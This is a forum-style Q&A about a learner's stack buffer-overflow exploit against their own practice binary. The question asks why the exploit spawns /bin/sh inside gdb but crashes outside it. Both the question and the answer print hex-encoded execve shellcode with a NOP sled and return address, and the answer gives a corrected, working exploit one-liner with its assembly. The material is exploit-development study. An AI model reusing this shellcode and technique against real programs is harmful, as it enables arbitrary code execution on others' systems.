Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof bof2.c bof3_env bof3_new_shellcode.txt bof3_shellcode.txt get_shell shellcode_exit shellcode_hello.c shellcode_shell2
bof.c bof3 bof3_env.c bof3_non_dbg func_stack get_shell.c shellcode_exit.c shellcode_shell shellcode_shell2.c
bof2 bof3.c bof3_gdb_env bof3_run_env func_stack.c shellcode_bof.c shellcode_hello shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)
And outside:
$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)
Immediately I searched about it and found this question: Buffer overflow works in gdb but not without it
Initially I thought it was just matter of unset two environment variables and discover a new return address, but unset two variables had not made the minimal difference:
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$
So now, this is the second question: Why the exploit works inside GDB but does not outside it?
The problem is the mov al,0x3b. You forgot to zero the top bits, so if they are not zero already, you will not be performing an execve syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert xor eax, eax before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example mov [rdi + 7], al just after you have cleared eax.
The full exploit could look like:
ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
The initial part corresponds to:
jmp short push_shell
starter:
pop rdi
xor eax, eax
mov [rdi + 7], al
mov al, 59
Note that due to the code size change, the offset for the jmp and the call at the end had to be changed as well, and the number of nop instructions too.
The above code (with the return address adjusted for my system) works fine here.

Resources